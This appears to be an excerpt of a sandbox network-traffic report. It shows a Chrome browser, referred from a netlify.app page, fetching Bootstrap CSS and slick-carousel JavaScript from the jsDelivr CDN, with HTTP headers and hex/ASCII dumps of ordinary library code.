2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 6c 6f 63 6b 65 64 3a 62 65 66 6f
      Data Ascii: tline:before,.ion-ios-keypad:before,.ion-ios-keypad-outline:before,.ion-ios-lightbulb:before,.ion-ios-lightbulb-outline:before,.ion-ios-list:before,.ion-ios-list-outline:before,.ion-ios-location:before,.ion-ios-location-outline:before,.ion-ios-locked:befo


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.649716151.101.129.2294431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC645OUTGET /npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css HTTP/1.1
      Host: cdn.jsdelivr.net
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      Origin: https://pengajuan-kartufisik.netlify.app
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: text/css,*/*;q=0.1
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: style
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC768INHTTP/1.1 200 OK
      Connection: close
      Content-Length: 193529
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: *
      Timing-Allow-Origin: *
      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
      Cross-Origin-Resource-Policy: cross-origin
      X-Content-Type-Options: nosniff
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Content-Type: text/css; charset=utf-8
      X-JSD-Version: 5.2.0-beta1
      X-JSD-Version-Type: version
      ETag: W/"2f3f9-YnOsGiPXmhIvAi9qh8W3XCz6/Do"
      Accept-Ranges: bytes
      Age: 76784
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      X-Served-By: cache-fra-etou8220113-FRA, cache-ewr-kewr1740023-EWR
      X-Cache: HIT, MISS
      Vary: Accept-Encoding
      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
      2024-09-27 02:26:39 UTC1378INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 32 2e 30 2d 62 65 74 61 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64
      Data Ascii: @charset "UTF-8";/*! * Bootstrap v5.2.0-beta1 (https://getbootstrap.com/) * Copyright 2011-2022 The Bootstrap Authors * Copyright 2011-2022 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--bs-blue:#0d
      2024-09-27 02:26:39 UTC1378INData Raw: 6f 6a 69 22 3b 2d 2d 62 73 2d 66 6f 6e 74 2d 6d 6f 6e 6f 73 70 61 63 65 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 6d 6f 6e 6f 73 70 61 63 65 3b 2d 2d 62 73 2d 67 72 61 64 69 65 6e 74 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 38 30 64 65 67 2c 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 31 35 29 2c 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 29 29 3b 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 6e 74 2d 73 61 6e 73 2d 73 65 72 69 66 29 3b 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74
      Data Ascii: oji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));--bs-body-font-family:var(--bs-font-sans-serif);--bs-body-font
      2024-09-27 02:26:39 UTC1378INData Raw: 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 68 65 61 64 69 6e 67 2d 63 6f 6c 6f 72 29 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 37 35 72 65 6d 20 2b 20 31 2e 35 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 32 35 72 65 6d 20 2b 20 2e 39 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d
      Data Ascii: m;font-weight:500;line-height:1.2;color:var(--bs-heading-color)}.h1,h1{font-size:calc(1.375rem + 1.5vw)}@media (min-width:1200px){.h1,h1{font-size:2.5rem}}.h2,h2{font-size:calc(1.325rem + .9vw)}@media (min-width:1200px){.h2,h2{font-size:2rem}}.h3,h3{font-
      2024-09-27 02:26:39 UTC1378INData Raw: 79 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 6e 74 2d 6d 6f 6e 6f 73 70 61 63 65 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 70 72 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 63 6f 64 65 2d 63 6f 6c 6f 72 29 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f
      Data Ascii: y:var(--bs-font-monospace);font-size:1em}pre{display:block;margin-top:0;margin-bottom:1rem;overflow:auto;font-size:.875em}pre code{font-size:inherit;color:inherit;word-break:normal}code{font-size:.875em;color:var(--bs-code-color);word-wrap:break-word}a>co
      2024-09-27 02:26:39 UTC1378INData Raw: 29 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 2c 62 75 74 74 6f 6e 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 74 65 78 74 61 72 65 61 7b 72 65 73 69 7a 65 3a 76 65 72 74 69 63 61 6c 7d 66 69 65 6c 64 73 65 74 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 65 67 65 6e 64 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 73 69
      Data Ascii: ),[type=submit]:not(:disabled),button:not(:disabled){cursor:pointer}::-moz-focus-inner{padding:0;border-style:none}textarea{resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{float:left;width:100%;padding:0;margin-bottom:.5rem;font-si
      2024-09-27 02:26:39 UTC1378INData Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 34 2e 35 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 35 32 35 72 65 6d 20 2b 20 33 2e 33 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 34 37 35 72 65 6d 20 2b 20 32 2e 37 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c
      Data Ascii: font-size:4.5rem}}.display-3{font-size:calc(1.525rem + 3.3vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-3{font-size:4rem}}.display-4{font-size:calc(1.475rem + 2.7vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.displ
      2024-09-27 02:26:39 UTC1378INData Raw: 2e 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 3b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 29 20 2a 20 2e 35 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 29 20 2a 20 2e 35 29 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 35 34 30 70 78 7d 7d 40 6d 65
      Data Ascii: .container-xxl{--bs-gutter-x:1.5rem;--bs-gutter-y:0;width:100%;padding-right:calc(var(--bs-gutter-x) * .5);padding-left:calc(var(--bs-gutter-x) * .5);margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@me
      2024-09-27 02:26:39 UTC1378INData Raw: 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 32 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 33 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 63 6f 6c 2d 34 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 35 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 34 31 2e 36 36 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 36 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 37 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 33 33 25 7d
      Data Ascii: {flex:0 0 auto;width:8.33333333%}.col-2{flex:0 0 auto;width:16.66666667%}.col-3{flex:0 0 auto;width:25%}.col-4{flex:0 0 auto;width:33.33333333%}.col-5{flex:0 0 auto;width:41.66666667%}.col-6{flex:0 0 auto;width:50%}.col-7{flex:0 0 auto;width:58.33333333%}
      2024-09-27 02:26:39 UTC1378INData Raw: 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 36 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 73 6d 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 32 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69
      Data Ascii: 33.3333333333%}.row-cols-sm-4>*{flex:0 0 auto;width:25%}.row-cols-sm-5>*{flex:0 0 auto;width:20%}.row-cols-sm-6>*{flex:0 0 auto;width:16.6666666667%}.col-sm-auto{flex:0 0 auto;width:auto}.col-sm-1{flex:0 0 auto;width:8.33333333%}.col-sm-2{flex:0 0 auto;wi
      2024-09-27 02:26:39 UTC1378INData Raw: 65 6d 7d 2e 67 2d 73 6d 2d 34 2c 2e 67 78 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 34 2c 2e 67 79 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 78 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 79 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 7b 66 6c 65 78 3a 31 20 30 20 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d 61 75 74 6f 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 6d 64 2d
      Data Ascii: em}.g-sm-4,.gx-sm-4{--bs-gutter-x:1.5rem}.g-sm-4,.gy-sm-4{--bs-gutter-y:1.5rem}.g-sm-5,.gx-sm-5{--bs-gutter-x:3rem}.g-sm-5,.gy-sm-5{--bs-gutter-y:3rem}}@media (min-width:768px){.col-md{flex:1 0 0%}.row-cols-md-auto>*{flex:0 0 auto;width:auto}.row-cols-md-


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      6192.168.2.649710151.101.129.2294431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC575OUTGET /npm/slick-carousel@1.8.1/slick/slick.min.js HTTP/1.1
      Host: cdn.jsdelivr.net
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: */*
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: script
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC775INHTTP/1.1 200 OK
      Connection: close
      Content-Length: 42863
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: *
      Timing-Allow-Origin: *
      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
      Cross-Origin-Resource-Policy: cross-origin
      X-Content-Type-Options: nosniff
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Content-Type: application/javascript; charset=utf-8
      X-JSD-Version: 1.8.1
      X-JSD-Version-Type: version
      ETag: W/"a76f-O0GzvJVmhQFaNHoiOOcdsp36Dbs"
      Accept-Ranges: bytes
      Age: 1096407
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      X-Served-By: cache-fra-eddf8230096-FRA, cache-ewr-kewr1740037-EWR
      X-Cache: HIT, HIT
      Vary: Accept-Encoding
      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
      2024-09-27 02:26:39 UTC1378INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 69 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 69 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 69 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 53 6c 69 63 6b 7c 7c 7b 7d 3b 28 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 76 61 72 20
      Data Ascii: !function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)}(function(i){"use strict";var e=window.Slick||{};(e=function(){var e=0;return function(t,o){var
      2024-09-27 02:26:39 UTC1378INData Raw: 78 3a 30 2c 24 6e 65 78 74 41 72 72 6f 77 3a 6e 75 6c 6c 2c 24 70 72 65 76 41 72 72 6f 77 3a 6e 75 6c 6c 2c 73 63 72 6f 6c 6c 69 6e 67 3a 21 31 2c 73 6c 69 64 65 43 6f 75 6e 74 3a 6e 75 6c 6c 2c 73 6c 69 64 65 57 69 64 74 68 3a 6e 75 6c 6c 2c 24 73 6c 69 64 65 54 72 61 63 6b 3a 6e 75 6c 6c 2c 24 73 6c 69 64 65 73 3a 6e 75 6c 6c 2c 73 6c 69 64 69 6e 67 3a 21 31 2c 73 6c 69 64 65 4f 66 66 73 65 74 3a 30 2c 73 77 69 70 65 4c 65 66 74 3a 6e 75 6c 6c 2c 73 77 69 70 69 6e 67 3a 21 31 2c 24 6c 69 73 74 3a 6e 75 6c 6c 2c 74 6f 75 63 68 4f 62 6a 65 63 74 3a 7b 7d 2c 74 72 61 6e 73 66 6f 72 6d 73 45 6e 61 62 6c 65 64 3a 21 31 2c 75 6e 73 6c 69 63 6b 65 64 3a 21 31 7d 2c 69 2e 65 78 74 65 6e 64 28 6e 2c 6e 2e 69 6e 69 74 69 61 6c 73 29 2c 6e 2e 61 63 74 69 76 65 42
      Data Ascii: x:0,$nextArrow:null,$prevArrow:null,scrolling:!1,slideCount:null,slideWidth:null,$slideTrack:null,$slides:null,sliding:!1,slideOffset:0,swipeLeft:null,swiping:!1,$list:null,touchObject:{},transformsEnabled:!1,unslicked:!1},i.extend(n,n.initials),n.activeB
      2024-09-27 02:26:39 UTC1378INData Raw: 63 65 55 69 64 3d 65 2b 2b 2c 6e 2e 68 74 6d 6c 45 78 70 72 3d 2f 5e 28 3f 3a 5c 73 2a 28 3c 5b 5c 77 5c 57 5d 2b 3e 29 5b 5e 3e 5d 2a 29 24 2f 2c 6e 2e 72 65 67 69 73 74 65 72 42 72 65 61 6b 70 6f 69 6e 74 73 28 29 2c 6e 2e 69 6e 69 74 28 21 30 29 7d 7d 28 29 29 2e 70 72 6f 74 6f 74 79 70 65 2e 61 63 74 69 76 61 74 65 41 44 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 24 73 6c 69 64 65 54 72 61 63 6b 2e 66 69 6e 64 28 22 2e 73 6c 69 63 6b 2d 61 63 74 69 76 65 22 29 2e 61 74 74 72 28 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 66 61 6c 73 65 22 7d 29 2e 66 69 6e 64 28 22 61 2c 20 69 6e 70 75 74 2c 20 62 75 74 74 6f 6e 2c 20 73 65 6c 65 63 74 22 29 2e 61 74 74 72 28 7b 74 61 62 69 6e 64 65 78 3a 22 30 22 7d 29 7d 2c 65 2e 70 72 6f 74 6f 74 79
      Data Ascii: ceUid=e++,n.htmlExpr=/^(?:\s*(<[\w\W]+>)[^>]*)$/,n.registerBreakpoints(),n.init(!0)}}()).prototype.activateADA=function(){this.$slideTrack.find(".slick-active").attr({"aria-hidden":"false"}).find("a, input, button, select").attr({tabindex:"0"})},e.prototy
      2024-09-27 02:26:39 UTC1378INData Raw: 61 73 69 6e 67 2c 74 29 3a 21 31 3d 3d 3d 73 2e 63 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 3f 28 21 30 3d 3d 3d 73 2e 6f 70 74 69 6f 6e 73 2e 72 74 6c 26 26 28 73 2e 63 75 72 72 65 6e 74 4c 65 66 74 3d 2d 73 2e 63 75 72 72 65 6e 74 4c 65 66 74 29 2c 69 28 7b 61 6e 69 6d 53 74 61 72 74 3a 73 2e 63 75 72 72 65 6e 74 4c 65 66 74 7d 29 2e 61 6e 69 6d 61 74 65 28 7b 61 6e 69 6d 53 74 61 72 74 3a 65 7d 2c 7b 64 75 72 61 74 69 6f 6e 3a 73 2e 6f 70 74 69 6f 6e 73 2e 73 70 65 65 64 2c 65 61 73 69 6e 67 3a 73 2e 6f 70 74 69 6f 6e 73 2e 65 61 73 69 6e 67 2c 73 74 65 70 3a 66 75 6e 63 74 69 6f 6e 28 69 29 7b 69 3d 4d 61 74 68 2e 63 65 69 6c 28 69 29 2c 21 31 3d 3d 3d 73 2e 6f 70 74 69 6f 6e 73 2e 76 65 72 74 69 63 61 6c 3f 28 6f 5b 73 2e 61 6e 69 6d 54 79 70 65 5d 3d
      Data Ascii: asing,t):!1===s.cssTransitions?(!0===s.options.rtl&&(s.currentLeft=-s.currentLeft),i({animStart:s.currentLeft}).animate({animStart:e},{duration:s.options.speed,easing:s.options.easing,step:function(i){i=Math.ceil(i),!1===s.options.vertical?(o[s.animType]=
      2024-09-27 02:26:39 UTC1378INData Raw: 6f 72 2c 69 2e 6f 70 74 69 6f 6e 73 2e 61 75 74 6f 70 6c 61 79 53 70 65 65 64 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 75 74 6f 50 6c 61 79 43 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 69 2e 61 75 74 6f 50 6c 61 79 54 69 6d 65 72 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 69 2e 61 75 74 6f 50 6c 61 79 54 69 6d 65 72 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 75 74 6f 50 6c 61 79 49 74 65 72 61 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 2c 65 3d 69 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 2b 69 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 3b 69 2e 70 61 75 73 65 64 7c 7c 69 2e 69 6e 74 65 72 72 75 70 74 65 64 7c 7c 69 2e 66 6f 63 75 73 73 65 64
      Data Ascii: or,i.options.autoplaySpeed))},e.prototype.autoPlayClear=function(){var i=this;i.autoPlayTimer&&clearInterval(i.autoPlayTimer)},e.prototype.autoPlayIterator=function(){var i=this,e=i.currentSlide+i.options.slidesToScroll;i.paused||i.interrupted||i.focussed
      2024-09-27 02:26:39 UTC1378INData Raw: 67 65 74 44 6f 74 43 6f 75 6e 74 28 29 3b 65 2b 3d 31 29 74 2e 61 70 70 65 6e 64 28 69 28 22 3c 6c 69 20 2f 3e 22 29 2e 61 70 70 65 6e 64 28 6f 2e 6f 70 74 69 6f 6e 73 2e 63 75 73 74 6f 6d 50 61 67 69 6e 67 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 2c 65 29 29 29 3b 6f 2e 24 64 6f 74 73 3d 74 2e 61 70 70 65 6e 64 54 6f 28 6f 2e 6f 70 74 69 6f 6e 73 2e 61 70 70 65 6e 64 44 6f 74 73 29 2c 6f 2e 24 64 6f 74 73 2e 66 69 6e 64 28 22 6c 69 22 29 2e 66 69 72 73 74 28 29 2e 61 64 64 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 61 63 74 69 76 65 22 29 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 62 75 69 6c 64 4f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 65 2e 24 73 6c 69 64 65 73 3d 65 2e 24 73 6c 69 64 65 72 2e 63 68 69 6c 64 72 65 6e 28 65
      Data Ascii: getDotCount();e+=1)t.append(i("<li />").append(o.options.customPaging.call(this,o,e)));o.$dots=t.appendTo(o.options.appendDots),o.$dots.find("li").first().addClass("slick-active")}},e.prototype.buildOut=function(){var e=this;e.$slides=e.$slider.children(e
